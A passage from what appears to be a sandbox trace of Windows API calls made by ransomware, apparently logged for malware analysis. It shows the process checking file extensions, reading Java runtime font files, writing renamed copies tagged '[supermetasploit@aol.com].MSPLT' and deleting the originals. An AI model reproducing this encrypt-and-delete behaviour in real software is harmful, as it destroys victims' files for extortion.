(lpString1=".bz2", lpString2=".src") returned -1 [0306.706] lstrlenW (lpString=".7z") returned 3 [0306.706] lstrcmpiW (lpString1=".7z", lpString2="src") returned -1 [0306.706] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 64 [0306.706] lstrlenW (lpString=".dbf") returned 4 [0306.706] lstrcmpiW (lpString1=".dbf", lpString2=".src") returned -1 [0306.706] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 64 [0306.707] lstrlenW (lpString=".1cd") returned 4 [0306.707] lstrcmpiW (lpString1=".1cd", lpString2=".src") returned -1 [0306.707] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 64 [0306.707] lstrlenW (lpString=".jpg") returned 4 [0306.707] lstrcmpiW (lpString1=".jpg", lpString2=".src") returned -1 [0306.707] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 64 [0306.707] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 64 [0306.707] lstrlenW (lpString=".doc") returned 4 [0306.707] lstrcmpiW (lpString1=".doc", lpString2=".src") returned -1 [0306.707] lstrlenW (lpString=".docx") returned 5 [0306.707] lstrcmpiW (lpString1=".docx", lpString2="s.src") returned -1 [0306.707] lstrlenW (lpString=".pdf") returned 4 [0306.707] lstrcmpiW (lpString1=".pdf", lpString2=".src") returned -1 [0306.707] lstrlenW (lpString=".xls") returned 4 [0306.707] lstrcmpiW (lpString1=".xls", lpString2=".src") returned 1 [0306.707] lstrlenW (lpString=".xlsx") returned 5 [0306.707] lstrcmpiW (lpString1=".xlsx", lpString2="s.src") returned -1 [0306.707] lstrlenW (lpString=".ppt") returned 4 [0306.707] lstrcmpiW (lpString1=".ppt", lpString2=".src") returned -1 [0306.707] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 64 [0306.707] lstrlenW (lpString=".zip") returned 4 [0306.707] lstrcmpiW (lpString1=".zip", lpString2=".src") returned 1 [0306.707] lstrlenW (lpString=".rar") returned 4 [0306.708] lstrcmpiW (lpString1=".rar", lpString2=".src") returned -1 [0306.708] lstrlenW (lpString=".bz2") returned 4 [0306.708] lstrcmpiW (lpString1=".bz2", lpString2=".src") returned -1 [0306.708] lstrlenW (lpString=".7z") returned 3 [0306.708] lstrcmpiW (lpString1=".7z", lpString2="src") returned -1 [0306.708] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 64 [0306.708] lstrlenW (lpString=".dbf") returned 4 [0306.708] lstrcmpiW (lpString1=".dbf", lpString2=".src") returned -1 [0306.708] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 64 [0306.708] lstrlenW (lpString=".1cd") returned 4 [0306.708] lstrcmpiW (lpString1=".1cd", lpString2=".src") returned -1 [0306.708] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 64 [0306.708] lstrlenW (lpString=".jpg") returned 4 [0306.708] lstrcmpiW (lpString1=".jpg", lpString2=".src") returned -1 [0306.708] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0306.708] lstrlenW (lpString="LucidaBrightDemiBold.ttf") returned 24 [0306.709] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemibold.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0306.713] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=75144) returned 1 [0306.713] CloseHandle (hObject=0x520) returned 1 [0306.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemibold.ttf")) returned 0x20 [0306.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemibold.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0306.714] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemibold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0306.714] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.714] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.714] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemibold.ttf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0306.717] GetLastError () returned 0x0 [0306.717] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x12588, lpOverlapped=0x0) returned 1 [0307.065] WriteFile (in: hFile=0x51c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x12590, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x12590, lpOverlapped=0x0) returned 1 [0307.068] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0307.068] WriteFile (in: hFile=0x51c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x104, lpOverlapped=0x0) returned 1 [0307.068] SetEndOfFile (hFile=0x51c) returned 1 [0307.068] CloseHandle (hObject=0x51c) returned 1 [0307.077] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.077] SetEndOfFile (hFile=0x520) returned 1 [0307.084] CloseHandle (hObject=0x520) returned 1 [0307.084] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0307.086] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemibold.ttf")) returned 1 [0307.087] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 69 [0307.087] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 69 [0307.087] lstrlenW (lpString=".doc") returned 4 [0307.088] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0307.088] lstrlenW (lpString=".docx") returned 5 [0307.088] lstrcmpiW (lpString1=".docx", lpString2="d.ttf") returned -1 [0307.088] lstrlenW (lpString=".pdf") returned 4 [0307.088] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0307.088] lstrlenW (lpString=".xls") returned 4 [0307.088] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0307.088] lstrlenW (lpString=".xlsx") returned 5 [0307.088] lstrcmpiW (lpString1=".xlsx", lpString2="d.ttf") returned -1 [0307.088] lstrlenW (lpString=".ppt") returned 4 [0307.088] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0307.088] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 69 [0307.088] lstrlenW (lpString=".zip") returned 4 [0307.088] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0307.088] lstrlenW (lpString=".rar") returned 4 [0307.088] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0307.088] lstrlenW (lpString=".bz2") returned 4 [0307.088] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0307.088] lstrlenW (lpString=".7z") returned 3 [0307.088] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0307.088] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 69 [0307.088] lstrlenW (lpString=".dbf") returned 4 [0307.088] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0307.088] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 69 [0307.088] lstrlenW (lpString=".1cd") returned 4 [0307.088] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0307.089] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 69 [0307.089] lstrlenW (lpString=".jpg") returned 4 [0307.089] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0307.089] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 69 [0307.089] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 69 [0307.089] lstrlenW (lpString=".doc") returned 4 [0307.089] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0307.089] lstrlenW (lpString=".docx") returned 5 [0307.089] lstrcmpiW (lpString1=".docx", lpString2="d.ttf") returned -1 [0307.089] lstrlenW (lpString=".pdf") returned 4 [0307.089] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0307.089] lstrlenW (lpString=".xls") returned 4 [0307.089] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0307.089] lstrlenW (lpString=".xlsx") returned 5 [0307.089] lstrcmpiW (lpString1=".xlsx", lpString2="d.ttf") returned -1 [0307.089] lstrlenW (lpString=".ppt") returned 4 [0307.089] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0307.089] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 69 [0307.089] lstrlenW (lpString=".zip") returned 4 [0307.089] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0307.090] lstrlenW (lpString=".rar") returned 4 [0307.090] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0307.090] lstrlenW (lpString=".bz2") returned 4 [0307.090] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0307.090] lstrlenW (lpString=".7z") returned 3 [0307.090] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0307.090] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 69 [0307.090] lstrlenW (lpString=".dbf") returned 4 [0307.090] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0307.090] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 69 [0307.090] lstrlenW (lpString=".1cd") returned 4 [0307.090] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0307.090] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 69 [0307.090] lstrlenW (lpString=".jpg") returned 4 [0307.090] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0307.090] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0307.090] lstrlenW (lpString="LucidaSansDemiBold.ttf") returned 22 [0307.090] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansdemibold.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0307.091] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=317896) returned 1 [0307.091] CloseHandle (hObject=0x520) returned 1 [0307.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansdemibold.ttf")) returned 0x20 [0307.092] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansdemibold.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0307.092] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansdemibold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0307.092] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.092] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.093] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansdemibold.ttf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0307.093] GetLastError () returned 0x0 [0307.093] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x4d9c8, lpOverlapped=0x0) returned 1 [0307.695] WriteFile (in: hFile=0x51c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x4d9d0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x4d9d0, lpOverlapped=0x0) returned 1 [0307.705] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0307.705] WriteFile (in: hFile=0x51c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x100, lpOverlapped=0x0) returned 1 [0307.705] SetEndOfFile (hFile=0x51c) returned 1 [0307.705] CloseHandle (hObject=0x51c) returned 1 [0308.010] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.010] SetEndOfFile (hFile=0x520) returned 1 [0308.021] CloseHandle (hObject=0x520) returned 1 [0308.021] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0308.022] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansdemibold.ttf")) returned 1 [0308.023] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 67 [0308.023] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 67 [0308.023] lstrlenW (lpString=".doc") returned 4 [0308.023] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0308.023] lstrlenW (lpString=".docx") returned 5 [0308.023] lstrcmpiW (lpString1=".docx", lpString2="d.ttf") returned -1 [0308.023] lstrlenW (lpString=".pdf") returned 4 [0308.023] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0308.023] lstrlenW (lpString=".xls") returned 4 [0308.023] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0308.023] lstrlenW (lpString=".xlsx") returned 5 [0308.023] lstrcmpiW (lpString1=".xlsx", lpString2="d.ttf") returned -1 [0308.023] lstrlenW (lpString=".ppt") returned 4 [0308.023] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0308.023] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 67 [0308.023] lstrlenW (lpString=".zip") returned 4 [0308.024] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0308.024] lstrlenW (lpString=".rar") returned 4 [0308.024] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0308.024] lstrlenW (lpString=".bz2") returned 4 [0308.024] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0308.024] lstrlenW (lpString=".7z") returned 3 [0308.024] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0308.024] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 67 [0308.024] lstrlenW (lpString=".dbf") returned 4 [0308.024] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0308.024] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 67 [0308.024] lstrlenW (lpString=".1cd") returned 4 [0308.024] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0308.024] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 67 [0308.024] lstrlenW (lpString=".jpg") returned 4 [0308.024] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0308.024] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 67 [0308.024] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 67 [0308.024] lstrlenW (lpString=".doc") returned 4 [0308.024] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0308.024] lstrlenW (lpString=".docx") returned 5 [0308.024] lstrcmpiW (lpString1=".docx", lpString2="d.ttf") returned -1 [0308.024] lstrlenW (lpString=".pdf") returned 4 [0308.024] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0308.024] lstrlenW (lpString=".xls") returned 4 [0308.024] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0308.025] lstrlenW (lpString=".xlsx") returned 5 [0308.025] lstrcmpiW (lpString1=".xlsx", lpString2="d.ttf") returned -1 [0308.025] lstrlenW (lpString=".ppt") returned 4 [0308.025] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0308.025] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 67 [0308.025] lstrlenW (lpString=".zip") returned 4 [0308.025] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0308.025] lstrlenW (lpString=".rar") returned 4 [0308.025] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0308.025] lstrlenW (lpString=".bz2") returned 4 [0308.025] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0308.025] lstrlenW (lpString=".7z") returned 3 [0308.025] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0308.025] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 67 [0308.025] lstrlenW (lpString=".dbf") returned 4 [0308.025] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0308.025] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 67 [0308.025] lstrlenW (lpString=".1cd") returned 4 [0308.025] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0308.025] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 67 [0308.025] lstrlenW (lpString=".jpg") returned 4 [0308.025] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0308.026] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0308.026] lstrlenW (lpString="LucidaTypewriterRegular.ttf") returned 27 [0308.026] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterregular.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0308.026] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=242700) returned 1 [0308.027] CloseHandle (hObject=0x520) returned 1 [0308.027] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterregular.ttf")) returned 0x20 [0308.027] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterregular.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0308.027] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0308.027] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.027] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.028] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterregular.ttf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0308.076] GetLastError () returned 0x0 [0308.076] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x3b40c, lpOverlapped=0x0) returned 1 [0308.125] WriteFile (in: hFile=0x51c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x3b410, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x3b410, lpOverlapped=0x0) returned 1 [0308.130] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0308.131] WriteFile (in: hFile=0x51c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x10a, lpOverlapped=0x0) returned 1 [0308.131] SetEndOfFile (hFile=0x51c) returned 1 [0308.131] CloseHandle (hObject=0x51c) returned 1 [0308.140] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.141] SetEndOfFile (hFile=0x520) returned 1 [0308.557] CloseHandle (hObject=0x520) returned 1 [0308.558] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0308.558] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterregular.ttf")) returned 1 [0308.559] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 72 [0308.559] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 72 [0308.559] lstrlenW (lpString=".doc") returned 4 [0308.559] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0308.559] lstrlenW (lpString=".docx") returned 5 [0308.559] lstrcmpiW (lpString1=".docx", lpString2="r.ttf") returned -1 [0308.559] lstrlenW (lpString=".pdf") returned 4 [0308.559] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0308.559] lstrlenW (lpString=".xls") returned 4 [0308.560] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0308.560] lstrlenW (lpString=".xlsx") returned 5 [0308.560] lstrcmpiW (lpString1=".xlsx", lpString2="r.ttf") returned -1 [0308.560] lstrlenW (lpString=".ppt") returned 4 [0308.560] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0308.560] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 72 [0308.560] lstrlenW (lpString=".zip") returned 4 [0308.560] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0308.560] lstrlenW (lpString=".rar") returned 4 [0308.560] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0308.560] lstrlenW (lpString=".bz2") returned 4 [0308.560] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0308.560] lstrlenW (lpString=".7z") returned 